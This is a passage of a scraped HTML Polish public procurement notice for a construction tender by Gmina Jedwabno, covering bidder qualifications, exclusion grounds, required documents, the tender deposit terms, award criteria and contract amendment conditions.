6 pkt.2) SIWZ. Zamawiający określając wymogi dla osób wzakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne uprawnieniabudowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów orazodpowiadające uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej,Konfederacji Szwajcarskiej oraz państwa członkowskie Europejskiego Porozumienia o WolnymHandlu (EFTA) - strony umowy o Europejskim Obszarze Gospodarczym z zastrzeżeniem art. 12aoraz innych przepisów Prawo budowlane oraz ustawy o zasadach uznania kwalifikacji zawodowychnabytych w państwach członkowskich Unii Europejskiej, wówczas wykonawca na własny kosztzapewni tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie w kontaktachpomiędzy Zamawiającym a Wykonawcą, a także zapewni tłumaczenie na bieżąco wszystkichdokumentów związanych z realizacją przedmiotowego zamówienia stworzonych zarówno przezWykonawcę, jak i dostarczonych przez Zamawiającego. Wykonawca zatrudniając tłumacza winienwziąć pod uwagę, iż z uwagi na złożony zakres przedmiotu zamówienia tłumacz ten winien byćbiegłym w tłumaczeniu zagadnień technicznych, ekonomicznych i prawnych. Wykonawcywspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że co najmniej jeden z nich lubalbo wszyscy łącznie spełniają w/w warunek</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia brakupodstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp, (wystawiony nie wcześniej niż 6miesięcy przed upływem terminu o składania ofert)</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1)wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przedupływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, ajeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju,wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, zzałączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, wszczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawabudowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądźinne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane,a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskaćtych dokumentów - inne dokumenty - zgodnie z załącznikiem nr 3 do SIWZ. 2)wykazu osób,skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególnościodpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi,wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia iwykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresuwykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami -zgodnie z załącznikiem nr 4 do SIWZ</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">8.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RzeczpospolitejPolskiej zamiast dokumentów, o których mowa w § VII ust. 6 pkt 3) SIWZ składa dokument lubdokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzająceodpowiednio, że: 1)nie otwarto jego likwidacji, ani nie ogłoszono upadłości - wystawiony niewcześniej niż 6 miesięcy przed upływem terminu składania ofert Jeżeli w kraju, w którymWykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, którejdokument dotyczy, nie wydaje się dokumentów, o których mowa w §VII ust. 6 pkt 3) SIWZ,zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniemosoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokumentmiał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym alboorganem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lubmiejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby z zachowaniem terminówich wystawienia, o których mowa w §VII ust.8 pkt 1) SIWZ.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1.Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości:4.000,00 zł w terminie do dnia 05.12.2017 r. do godz. 10:00 2.Wadium może być wniesione wnastępującej formie: 1)Pieniądzu - przelewem na konto zamawiającego, prowadzone w BankuSpółdzielczym w Szczytnie Oddział Jedwabno Nr konta bankowego: 73 8838 1015 2004 01058519 0006, o uznaniu przez zamawiającego, że wadium w pieniądzu wpłacono w terminie decydujedata wpływu środków na rachunek zamawiającego. Wniesienie wadium w pieniądzu będzieskuteczne, jeżeli znajdzie się na rachunku bankowym Zamawiającego, przed upływem terminu(godziny) przewidzianego na wniesienie wadium. 2)Poręczeniach bankowych lub poręczeniachspółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniempieniężnym 3)Gwarancji bankowej 4)Gwarancji ubezpieczeniowej 5)Poręczeniach udzielanychprzez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. outworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2016 r. poz. 359 z późn. zm.)3.W zależności od wybranej formy wadium (ust. 2 pkt 2-5) - zaleca się kserokopię dokumentupotwierdzającego wniesienie wadium dołączyć do oferty, a oryginał należy umieścić w koperciewraz z ofertą. 4.Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium,winna spełniać co najmniej następujące wymogi (pod rygorem wykluczenia wykonawcy): 1)ustalaćbeneficjenta gwarancji, tj. Gminę Jedwabno reprezentowaną przez Wójta Gminy Jedwabno,2)określać kwotę gwarantowaną w zł (ustaloną w SIWZ), 3)określać termin ważności (wynikającyz SIWZ), 4)określać przedmiot gwarancji (wynikający z SIWZ), 5)musi zawierać klauzulegwarantujące bezwarunkową wypłatę na rzecz zamawiającego w przypadku wystąpieniaokoliczności wymienionych w art. 46 ust. 4a i ust. 5 ustawy Pzp tj. być gwarancją nieodwoływalną, bezwarunkową, płatną na każde żądanie do wypłaty Zamawiającemu pełnej kwotywadium w następujących okolicznościach: a)gdy wykonawca odmówił podpisania umowy wsprawie zamówienia publicznego na warunkach określonych w ofercie; b)nie wniósł wymaganegozabezpieczenia należytego wykonania umowy; c)zawarcie umowy w sprawie zamówieniapublicznego stało się nie możliwe z przyczyn leżących po stronie wykonawcy; (art. 46 ust.5 ustawypzp) 6)być gwarancją nie odwoływalną, płatną na każde żądanie do wypłaty Zamawiającemu pełnejkwoty wadium w przypadku gdy wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust. 3 i 3a, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentówpotwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o którym mowa wart. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art.87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jakonajkorzystniejszej; (art.46 ust.4a ustawy pzp). 7)Gwarancja musi być podpisana przezupoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony wsposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (zpodaniem imienia i nazwiska). 5.Wadium wniesione w pieniądzu zamawiający przechowuje narachunku bankowym. 6.Wadium musi obejmować cały okres związania ofertą. 7.Oferta, która niebędzie zabezpieczona wadium wniesionym we właściwej formie, terminie i kwocie zostanieodrzucona przedmiotowego postępowania. 8.Zwrot wadium: 1)Zamawiający zwraca wadiumwszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniupostępowania, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza;2)Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadiumniezwłocznie po zawarciu umowy w sprawie niniejszego zamówienia; 3)Zamawiający zwracaniezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminuskładania ofert; 4)Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkamiwynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszoneo koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy narachunek bankowy wskazany przez wykonawcę. Zaleca się wskazanie w ofercie nr rachunkubankowego, na który należy dokonać zwrotu. 9.Utrata wadium: 1)Zamawiający zatrzymuje wadiumwraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i3a, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzającychokoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o którym mowa w art. 25a ust. 1,pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3,co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jakonajkorzystniejszej; 2)Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca,którego oferta została wybrana: a)odmówił podpisania umowy w sprawie zamówienia publicznegona warunkach określonych w ofercie; b)nie wniósł wymaganego zabezpieczenia należytegowykonania umowy; c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe zprzyczyn leżących po stronie wykonawcy. 10.Zasady wnoszenia wadium określone w niniejszymparagrafie dotyczą również przedłużania ważności wadium oraz wnoszenia nowego wadium wprzypadkach określonych w ustawie. 11.Zamawiający odrzuci ofertę z postępowania na podstawieart. 89 ust. 1 pkt 7b) ustawy Pzp</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji i rękojmi</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:1.Zmiana postanowień niniejszej Umowy może nastąpić za zgodą obydwu Stron wyrażoną na piśmie,w formie aneksu do umowy z zachowaniem formy pisemnej pod rygorem nieważności takiej zmiany.2.Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określanastępujące okoliczności zmiany terminu ustalonego w § 3 ust. 1 niniejszej Umowy, w szczególności:1)Wstrzymania, zawieszenia robót przez Zamawiającego, 2)zmiany spowodowane warunkamiatmosferycznymi w szczególności: a)uniemożliwiające prawidłowe wykonanie/prowadzeniezamówień/ robót budowlanych, zgodnie z technologią ich wykonywania, normami lub innymiprzepisami, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów, wymagającej konkretnychwarunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwemokolicznościami, za które Wykonawca ponosi odpowiedzialność, b)klęski żywiołowe - fakt ten musimieć odzwierciedlenie w Dzienniku budowy i musi być potwierdzony przez Zamawiającego iInspektora Nadzoru Inwestorskiego. 3)wystąpienia wad Dokumentacji projektowej skutkującychkoniecznością dokonania zmian w Dokumentacji projektowej, jeżeli uniemożliwia to lub wstrzymujerealizację określonego rodzaju robót mających wpływ na Termin wykonywania robót fakt ten musimieć odzwierciedlenie w Dzienniku budowy i musi być potwierdzony przez Zamawiającego iInspektora Nadzoru Inwestorskiego. 4)wystąpienia konieczności wykonania robót zamiennych nawniosek Zamawiającego lub Wykonawcy, udzielenia zamówień dodatkowych lub uzupełniających,które wstrzymują lub opóźniają realizację przedmiotu Umowy, 5)wystąpienia opóźnienia wwydawaniu decyzji, zezwoleń, uzgodnień, itp. czynności lub ich zaniechania, do wydania którychwłaściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres,przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie sąnastępstwem okoliczności, za które Wykonawca ponosi odpowiedzialność 6)odmowy wydania przezwłaściwe organy decyzji, zezwoleń, uzgodnień itp. z przyczyn niezawinionych przez Wykonawcę7)niemożności wykonywania robót z powodu braku dostępności do miejsc niezbędnych do ichwykonania z przyczyn niezawinionych przez Wykonawcę, 8)działania siły wyższej , mającejbezpośredni wpływ na terminowość wykonywania robót, 9)wystąpienia okoliczności, których stronyumowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności, 10)wystąpieniazmian spowodowanych 